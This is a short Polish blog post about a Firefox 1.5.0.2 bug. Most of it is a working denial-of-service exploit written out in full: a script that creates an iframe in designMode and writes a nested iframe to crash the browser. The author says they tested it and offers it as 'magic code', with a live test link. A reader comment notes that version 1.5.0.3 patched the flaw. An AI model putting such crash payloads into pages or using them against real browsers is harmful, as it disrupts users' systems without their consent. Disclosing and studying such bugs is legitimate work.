Bug w Firefoksie

Znaleziono groźny bug w tej „wspaniałej” przeglądarce. Pojawił się exploit wysypujący najnowszego FireFoxa (1.5.0.2) :)

Na informacje o tym bugu natknąłem się w notce Piotra Koniecznego

Przetestowałem i potwierdzam działanie exploita :)
Poniżej znajduje się magiczny kodzik działający cuda :D

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo">
</textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Przetestować można tutaj: Firefox 1.5.0.2 DoS Exploit
Opis luki: http://www.securident.com/~securide/vuln/ff.txt

Pewnie prace nad łatką już trwają…

3 przemyślenia nt. „Bug w Firefoksie”

  1. No wczoraj wyszła wersja 1.5.0.3 usuwająca właśnie ten krytyczny bug związany z designMode umożliwiający wykonanie ataku Denial of Service.

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *